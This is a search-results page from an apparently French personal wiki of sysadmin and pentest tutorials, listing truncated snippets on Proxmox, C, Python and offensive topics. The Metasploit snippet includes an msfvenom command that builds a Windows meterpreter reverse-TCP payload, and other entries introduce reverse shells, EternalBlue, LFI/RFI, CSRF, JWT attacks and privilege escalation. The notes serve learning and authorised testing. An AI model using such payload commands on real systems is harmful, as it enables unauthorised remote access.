Skip to main content
Advanced Search
Search Terms
Content Type

Exact Matches
Tag Searches
Date Options
Updated after
Updated before
Created after
Created before

Search Results

314 total results found

[Debian] Serveur NTP

Debian

Introduction Il peut être utile d'installer un serveur de temps sur un réseau lorsque vous faites des opérations qui nécessitent que les horloges de vos différents systèmes soient synchronisées. Installation serveur Commencez par installer le paquet ntp sur...

[OS] Kali Linux

OS

Introduction La distribution Kali Linux est basé sur Debian et il est dédié aux tâches de pentest. Il s'agit certainement du système le plus réputé dans le domaine de la sécurité informatique. Ce tutoriel va traiter une installation dans une machine virtuel...

[Proxmox] Spice

Proxmox

Introduction Le protocole SPICE est utilisé pour accéder graphiquement à la console de vos machines virtuelles sur Proxmox. Il est plus agréable d'utilisation que le serveur VNC utilisé par défaut à travers le navigateur puisqu'il permet une meilleure intégr...

[Bash] Explainshell

Bash

Introduction Cet outil en ligne vous permet de décomposer une commande afin de comprendre le fonctionnement et l'intérêt des paramètres. Site ExplainShell

[SOC] Afficher l'empreinte d'un fichier

SOC

Introduction Dans le cadre du travail d'analyste, il peut être intéressant d'obtenir l'empreinte d'un fichier sous ses différentes formes (MD5, SHA-1 ou SHA-256). Ce tutoriel traitera la méthodologie à suivre sous Linux exclusivement. Manuel MD5 md5sum ...

[Proxmox] Gestion de VMs en CLI

Proxmox

Introduction Lors d'un dépannage d'appoint, il peut s'avérer utile de manipuler vos machines virtuelles et vos conteneurs depuis le shell via la commande qm. Cheat-sheet Lister vos VMs qm list Démarrer une VM qm start <VMID> Éteindre une VM qm shutdown...

[Python] Socket

Python

Introduction En python, pour créer des applications en réseau il faut passer par des sockets qui est un objet de communication réseau qui permet d'échanger de l'information sur la couche IP. Codage Quelques explications Le socket est composé : D'un pr...

[Exploitation/Réseau] Netcat

Exploitation Réseau

Introduction Netcat est un outil en ligne de commande qui permet de travailler sur des connexions réseaux TCP et UDP. Il peut être utile pour diagnostiquer ou se connecter à des applications rustiques utilisant des sockets traditionnels. Manuel Connexion...

[Exploitation/Réseau] Pwncat

Exploitation Réseau

Introduction Cet outil vise à fournir la même fonction que netcat avec des fonctions supplémentaires très pratiques lors de vos tests d'intrusion. Installation Voici la commande pour installer pwncat dans un environnement virtuel : python3 -m venv /opt/p...

[Exploitation/Réseau] Metasploit

Exploitation Réseau

Introduction Metasploit est un framework complet pour les pentester. Il est très célèbre et réputé pour sa facilité d'utilisation. Reverse shell Meterpreter Payload Windows msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> --format=exe ...

[Exploitation/Réseau] Reverse shell

Exploitation Réseau

Introduction Le reverse shell est un type de payload qui permet à l'attaquant d'établir une connexion dans le sens inverse d'un bind shell et qui vous permet d'exécuter des commandes à distance.   Revshell.com Ce site permet de générer des reverse shells ...

[Powershell] Cheat-sheet

Powershell

Introduction Vous pouvez effectuer des opérations pratiques avec Powershell. Certaines commandes seront données dans cette page. Cheat-sheet Télécharger un fichier Invoke-WebRequest -Uri "<LINK>" -OutFile "<OUTPUT>" Obtenir le hash d'un fichier Get-File...

[Privesc/Windows] Winpeas

Privesc Windows

Introduction Winpeas est l'équivalent de Linpeas pour Windows. Il permet de faire de l'énumération afin de trouver comment vous allez pouvoir procéder pour l'escalade de privilège. Manuel Pour lancer Winpeas sur la machine cible vous allez devoir le téléc...

[Exploitation/Windows] Eternal Blue

Exploitation Windows

Introduction L'exploit Eternal Blue a été développé par la NSA en 2017. Il fait suite à l'exploitation de la vulnérabilité MS17-010 lors de la campagne de Ransomware Wannacry. La faille est présente dans la v1 du protcole SMB et permet notamment une RCE. ...

[Exploitation/Web] LFI / RFI

Exploitation Web

Introduction Les vulnérabilités web LFI pour Local File Inclusion et RFI pour Remote File Inclusion sont utilisées pour accéder à des ressources non autorisées sur le serveur cible. Elles exploitent généralement un paramètre mal protégé qui utilise souvent u...

[Énumération/Linux] Git-dumper

Recon & Enum Linux

Introduction Parfois, le site web que vous attaquez peut contenir un dépôt Git. Dans ce cas, il peut être intéressant le récupérer pour accéder au code source voire aux fichiers de configurations qui pourraient contenir des mots de passe ou autre. Git-dumpe...

[Exploitation/Web] CSRF

Exploitation Web

Introduction La faille CSRF pour Cross- Site Request Forgery fonctionne presque sur le même principe que XSS mais a pour objectif de faire exécuter à un utilisateur privilégié, une fonction non accessible en temps normal. Source Documentation - PortSwigge...

[Exploitation/Web] JWT

Exploitation Web

Introduction Les JWT pour JSON web tokens sont des jetons utilisés un peu de la même manière que les cookies qui permettent de gérer l'authentification à une page. Ils sont segmentés en 3 parties séparées par des points : Le header. Le payload (contenu). ...

[C] Threads

C

Introduction Le langage C supporte l'utilisation des threads qui sont des tâches sous-jacentes d'un processus permettant d'effectuer plusieurs tâches en parallèle. Manuel pthread_create La fonction pthread_create va permettre d'exécuter une fonction dans u...

[C] Fichiers

C

Introduction Le langage C permet de sauvegarder ou de lire du texte et du contenu binaire dans des fichiers. Exemple #include <stdio.h> #include <stdlib.h> #include <string.h> // Function to save text into a file void saveText(const char *fileName, co...